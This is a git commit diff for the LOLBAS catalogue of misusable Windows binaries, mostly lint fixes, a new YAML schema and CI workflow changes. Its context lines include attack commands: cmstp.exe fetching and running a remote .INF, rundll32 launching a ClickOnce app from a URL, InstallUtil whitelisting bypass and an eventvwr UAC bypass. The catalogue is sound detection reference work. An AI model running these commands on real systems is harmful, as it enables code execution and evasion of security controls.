Merge pull request #251 from xenoscr/master

YAML Linting & Schema Checks
2025-04-25 16:23:00 +02:00 · 2022-09-15 13:46:31 -04:00 · 2022-09-15 13:46:31 -04:00 · 5e55bcb82e
commit 5e55bcb82e
parent 8810e30f0a 033598bc77
170 changed files with 640 additions and 632 deletions
--- a/.github/.yamllint
+++ b/.github/.yamllint
@ -4,12 +4,12 @@ yaml-files:
  - '*.yml'
 rules:
  new-line-at-end-of-file:
-    level: warning
+    level: error
  trailing-spaces:
-    level: warning
+    level: error
  line-length:
    level: warning
  new-lines:
-    level: warning
+    level: error
  indentation:
-    level: warning
+    level: error
--- a/.github/workflows/gh-pages.yml
+++ b/.github/workflows/gh-pages.yml
@ -16,7 +16,7 @@ jobs:
      - name: Change .yml to .md
        run: |
-          for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
+          for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
          mv yml/OSBinaries yml/Binaries
          mv yml/OSLibraries yml/Libraries
          mv yml/OSScripts yml/Scripts
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
@ -1,19 +1,35 @@
 ---
-name: YAML Lint
+name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
-on:
+on: [push,pull_request]
  push:
    branches:
      - master
  pull_request:
    branches:
      - master
 jobs:
  lintFiles:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/checkout@v1
+      - uses: actions/checkout@v3
      - name: yaml-lint
        uses: ibiqlik/action-yamllint@v3
        with:
          no_warnings: true
          file_or_dir: yml/**/*.yml
          config_file: .github/.yamllint
      - name: Validate OSBinaries YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OSBinaries/*.yml
          schema: YML-Schema.yml
      - name: Validate OSLibraries YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OSLibraries/*.yml
          schema: YML-Schema.yml
      - name: Validate OSScripts YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OSScripts/*.yml
          schema: YML-Schema.yml
      - name: Validate OtherMSBinaries YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OtherMSBinaries/*.yml
          schema: YML-Schema.yml
--- a/.github/yaml-lint-reviewdog.yml.bak
+++ b/.github/yaml-lint-reviewdog.yml.bak
@ -0,0 +1,35 @@
 ---
 name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
 on: [pull_request]
 jobs:
  lintFiles:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run yamllint
        uses: reviewdog/action-yamllint@v1
        with:
          level: error
          reporter: github-pr-review # Change reporter.
          yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
      - name: Validate OSBinaries YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OSBinaries/*.yml
          schema: YML-Schema.yml
      - name: Validate OSLibraries YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OSLibraries/*.yml
          schema: YML-Schema.yml
      - name: Validate OSScripts YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OSScripts/*.yml
          schema: YML-Schema.yml
      - name: Validate OtherMSBinaries YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OtherMSBinaries/*.yml
          schema: YML-Schema.yml
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
 ---
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
@ -23,4 +23,3 @@ Resources:
 Acknowledgement:
  - Person: Bart
    Handle: '@bartblaze'
 ---
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
@ -15,4 +15,3 @@ Full_Path:
  - Path: '%localappdata%\Whatsapp\Update.exe'
 Detection:
  - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
 ---
--- a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
@ -25,4 +25,3 @@ Acknowledgement:
    Handle: '@@vysecurity'
  - Person: Adam (Internals)
    Handle: '@Hexacorn'
 ---
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
@ -0,0 +1,118 @@
 ---
 type: map
 mapping:
 # Id field enhancement possibility commenting out for now
 #  "Id":
 #    type: str
 #    required: true
 #    pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
  "Name":
    type: str
    required: true
  "Description":
    type: str
    required: true
  "Aliases":
    type: seq
    required: false
    sequence:
      - type: map
        mapping:
          "Alias":
            type: str
            required: false
  "Author":
    type: str
    required: true
  "Created":
    type: date
    required: true
  "Commands":
    type: seq
    required: true
    sequence:
      - type: map
        mapping:
          "Command":
            type: str
            required: true
          "Description":
            type: str
            required: true
          "Usecase":
            type: str
            required: true
          "Category":
            type: str
            required: true
            enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
          "Privileges":
            type: str
            required: true
          "MitreID":
            type: str
            required: true
            pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
          "OperatingSystem":
            type: str
            required: true
  "Full_Path":
    type: seq
    required: true
    sequence:
      - type: map
        mapping:
          "Path":
            type: str
            required: true
  "Code_Sample":
    type: seq
    required: false
    sequence:
      - type: map
        mapping:
          "Code":
            type: str
  "Detection":
    type: seq
    required: false
    sequence:
      - type: map
        mapping:
          "IOC":
            type: str
          "Sigma":
            type: str
            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
          "Analysis":
            type: str
            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
          "Elastic":
            type: str
            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
          "Splunk":
            type: str
            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
          "BlockRule":
            type: str
            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
  "Resources":
    type: seq
    required: false
    sequence:
      - type: map
        mapping:
          "Link":
            type: str
            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
  "Acknowledgement":
    type: seq
    required: false
    sequence:
      - type: map
        mapping:
          "Person":
            type: str
          "Handle":
            type: str
            pattern: '^(@(\w){1,15})?$'
--- a/YML-Template.yml
+++ b/YML-Template.yml
@ -6,6 +6,8 @@ Created: YYYY-MM-DD (date the person created this file)
 Commands:
  - Command: The command
    Description: Description of the command
    Aliases:
      - An alias for the command (example: ProcDump.exe & ProcDump64.exe)
    Usecase: A description of the usecase
    Category: Execute
    Privileges: Required privs
--- a/yml/OSBinaries/AppInstaller.yml
+++ b/yml/OSBinaries/AppInstaller.yml
@ -20,4 +20,3 @@ Resources:
 Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'
 ---
--- a/yml/OSBinaries/Aspnet_Compiler.yml
+++ b/yml/OSBinaries/Aspnet_Compiler.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: cpl
    Handle: '@cpl3h'
 ---
--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@ -23,7 +23,7 @@ Detection:
  - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
 Resources:
  - Link: https://freddiebarrsmith.com/at.txt
-  - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
+  - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
  - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
 Acknowledgement:
  - Person: 'Freddie Barr-Smith'
@ -34,4 +34,3 @@ Acknowledgement:
    Handle:
  - Person: 'Xabier Ugarte-Pedrero'
    Handle:
 ---
--- a/yml/OSBinaries/Atbroker.yml
+++ b/yml/OSBinaries/Atbroker.yml
@ -14,8 +14,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\Atbroker.exe
  - Path: C:\Windows\SysWOW64\Atbroker.exe
 Code_Sample:
 - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
@ -27,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'
 ---
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@ -48,4 +48,3 @@ Acknowledgement:
    Handle: '@aionescu'
  - Person: Asif Matadar
    Handle: '@d1r4c'
 ---
--- a/yml/OSBinaries/Bitsadmin.yml
+++ b/yml/OSBinaries/Bitsadmin.yml
@ -46,7 +46,7 @@ Detection:
  - IOC: bitsadmin creates new files
  - IOC: bitsadmin adds data to alternate data stream
 Resources:
-  - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
+  - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
  - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
 Acknowledgement:
@ -56,4 +56,3 @@ Acknowledgement:
    Handle: '@carnal0wnage'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/Certoc.yml
+++ b/yml/OSBinaries/Certoc.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Ensar Samil
    Handle: '@sblmsrsn'
 ---
--- a/yml/OSBinaries/Certreq.yml
+++ b/yml/OSBinaries/Certreq.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: David Middlehurst
    Handle: '@dtmsecurity'
 ---
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@ -75,4 +75,3 @@ Acknowledgement:
  - Person: egre55
    Handle: '@egre55'
  - Person: Lior Adar
 ---
--- a/yml/OSBinaries/Cmd.yml
+++ b/yml/OSBinaries/Cmd.yml
@ -21,8 +21,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\cmd.exe
  - Path: C:\Windows\SysWOW64\cmd.exe
 Code_Sample:
 - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
@ -34,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: r0lan
    Handle: '@yeyint_mth'
 ---
--- a/yml/OSBinaries/Cmdkey.yml
+++ b/yml/OSBinaries/Cmdkey.yml
@ -14,8 +14,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\cmdkey.exe
  - Path: C:\Windows\SysWOW64\cmdkey.exe
 Code_Sample:
 - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
 Resources:
@ -24,4 +22,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
 ---
--- a/yml/OSBinaries/Cmdl32.yml
+++ b/yml/OSBinaries/Cmdl32.yml
@ -23,4 +23,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
 ---
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@ -14,15 +14,13 @@ Commands:
  - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
    Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
    Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
-    Category: AwL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\cmstp.exe
  - Path: C:\Windows\SysWOW64\cmstp.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
@ -44,4 +42,3 @@ Acknowledgement:
    Handle: '@oddvarmoe'
  - Person: Nick Tyrer
    Handle: '@NickTyrer'
 ---
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@ -29,4 +29,3 @@ Resources:
 Acknowledgement:
  - Person: Ialle Teixeira
    Handle: '@NtSetDefault'
 ---
--- a/yml/OSBinaries/Conhost.yml
+++ b/yml/OSBinaries/Conhost.yml
@ -24,4 +24,3 @@ Acknowledgement:
    Handle: '@hexacorn'
  - Person: Wietze
    Handle: '@wietze'
 ---
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@ -15,7 +15,7 @@ Full_Path:
  - Path: C:\Windows\System32\control.exe
  - Path: C:\Windows\SysWOW64\control.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
 ---
--- a/yml/OSBinaries/Csc.yml
+++ b/yml/OSBinaries/Csc.yml
@ -22,7 +22,7 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
 ---
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/DataSvcUtil.yml
+++ b/yml/OSBinaries/DataSvcUtil.yml
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Ialle Teixeira
    Handle: '@NtSetDefault'
 ---
--- a/yml/OSBinaries/Desktopimgdownldr.yml
+++ b/yml/OSBinaries/Desktopimgdownldr.yml
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Gal Kristal
    Handle: '@gal_kristal'
 ---
--- a/yml/OSBinaries/Dfsvc.yml
+++ b/yml/OSBinaries/Dfsvc.yml
@ -7,7 +7,7 @@ Commands:
  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
    Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
    Usecase: Use binary to bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -17,7 +17,7 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
 Resources:
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
 ---
--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@ -35,4 +35,3 @@ Acknowledgement:
    Handle: '@tim8288'
  - Person: Hai Vaknin
    Handle: '@vakninhai'
 ---
--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@ -22,7 +22,7 @@ Full_Path:
  - Path: C:\Windows\System32\diskshadow.exe
  - Path: C:\Windows\SysWOW64\diskshadow.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
 ---
--- a/yml/OSBinaries/Dnscmd.yml
+++ b/yml/OSBinaries/Dnscmd.yml
@ -15,7 +15,7 @@ Full_Path:
  - Path: C:\Windows\System32\Dnscmd.exe
  - Path: C:\Windows\SysWOW64\Dnscmd.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
  - IOC: Dnscmd.exe loading dll from UNC/arbitrary path
@ -32,4 +32,3 @@ Acknowledgement:
    Handle: '@dim0x69'
  - Person: Nikhil SamratAshok
    Handle: '@nikhil_mitt'
 ---
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@ -50,7 +50,7 @@ Full_Path:
  - Path: C:\Windows\System32\esentutl.exe
  - Path: C:\Windows\SysWOW64\esentutl.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
@ -66,5 +66,4 @@ Acknowledgement:
  - Person: egre55
    Handle: '@egre55'
  - Person: Mike Cary
-    Handle: 'grayfold3d'
+    Handle: '@grayfold3d'
 ---
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@ -7,7 +7,7 @@ Commands:
  - Command: eventvwr.exe
    Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
    Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
-    Category: UAC bypass
+    Category: UAC Bypass
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -31,4 +31,3 @@ Acknowledgement:
    Handle: '@enigma0x3'
  - Person: Matt Graeber
    Handle: '@mattifestation'
 ---
--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@ -29,7 +29,7 @@ Full_Path:
  - Path: C:\Windows\System32\Expand.exe
  - Path: C:\Windows\SysWOW64\Expand.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
@ -41,4 +41,3 @@ Acknowledgement:
    Handle: '@infosecn1nja'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@ -37,4 +37,3 @@ Acknowledgement:
    Handle: '@CyberRaiju'
  - Person: Jimmy
    Handle: '@bohops'
 ---
--- a/yml/OSBinaries/Extexport.yml
+++ b/yml/OSBinaries/Extexport.yml
@ -1,6 +1,6 @@
 ---
 Name: Extexport.exe
-Description:
+Description: Load a DLL located in the c:\test folder with a specific name.
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'
 ---
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@ -1,6 +1,6 @@
 ---
 Name: Extrac32.exe
-Description:
+Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -54,4 +54,3 @@ Acknowledgement:
    Handle: '@VakninHai'
  - Person: Tamir Yehuda
    Handle: '@tim8288'
 ---
--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@ -1,6 +1,6 @@
 ---
 Name: Findstr.exe
-Description:
+Description: Write to ADS, discover, or download files with Findstr.exe
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -36,7 +36,7 @@ Full_Path:
  - Path: C:\Windows\System32\findstr.exe
  - Path: C:\Windows\SysWOW64\findstr.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
 Resources:
@ -45,4 +45,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/Finger.yml
+++ b/yml/OSBinaries/Finger.yml
@ -28,4 +28,3 @@ Acknowledgement:
    Handle: '@Ocelotty6669'
  - Person: Malwrologist
    Handle: '@DissectMalware'
 ---
--- a/yml/OSBinaries/FltMC.yml
+++ b/yml/OSBinaries/FltMC.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Carlos Perez
    Handle: '@Carlos_Perez'
 ---
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@ -22,7 +22,7 @@ Full_Path:
  - Path: C:\Windows\System32\forfiles.exe
  - Path: C:\Windows\SysWOW64\forfiles.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
 Resources:
@ -34,4 +34,3 @@ Acknowledgement:
    Handle: '@vector_sec'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@ -22,7 +22,7 @@ Full_Path:
  - Path: C:\Windows\System32\ftp.exe
  - Path: C:\Windows\SysWOW64\ftp.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
  - IOC: cmd /c as child process of ftp.exe
@ -37,5 +37,4 @@ Acknowledgement:
  - Person: BennyHusted
    Handle: ''
  - Person: Amit Serper
-    Handle: '@0xAmit '
+    Handle: '@0xAmit'
 ---
--- a/yml/OSBinaries/GfxDownloadWrapper.yml
+++ b/yml/OSBinaries/GfxDownloadWrapper.yml
@ -176,4 +176,3 @@ Resources:
 Acknowledgement:
  - Person: Jesus Galvez
    Handle:
 ---
--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@ -35,4 +35,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/IMEWDBLD.yml
+++ b/yml/OSBinaries/IMEWDBLD.yml
@ -20,4 +20,3 @@ Resources:
 Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'
 ---
--- a/yml/OSBinaries/Ie4uinit.yml
+++ b/yml/OSBinaries/Ie4uinit.yml
@ -1,6 +1,6 @@
 ---
 Name: Ie4uinit.exe
-Description:
+Description: Executes commands from a specially prepared ie4uinit.inf file.
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
 ---
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
 ---
--- a/yml/OSBinaries/Ilasm.yml
+++ b/yml/OSBinaries/Ilasm.yml
@ -17,6 +17,7 @@ Commands:
    Category: Compile
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10,7
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
@ -32,4 +33,3 @@ Acknowledgement:
    Handle: '@VakninHai'
  - Person: Lior Adar
    Handle:
 ---
--- a/yml/OSBinaries/Infdefaultinstall.yml
+++ b/yml/OSBinaries/Infdefaultinstall.yml
@ -15,7 +15,7 @@ Full_Path:
  - Path: C:\Windows\System32\Infdefaultinstall.exe
  - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
 Code_Sample:
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
+  - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Kyle Hanslovan
    Handle: '@kylehanslovan'
 ---
--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@ -7,7 +7,7 @@ Commands:
  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
    Description: Execute the target .NET DLL or EXE.
    Usecase: Use to execute code and bypass application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -24,7 +24,7 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
@ -39,4 +39,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
 ---
--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Malwrologist
    Handle: '@DissectMalware'
 ---
--- a/yml/OSBinaries/Makecab.yml
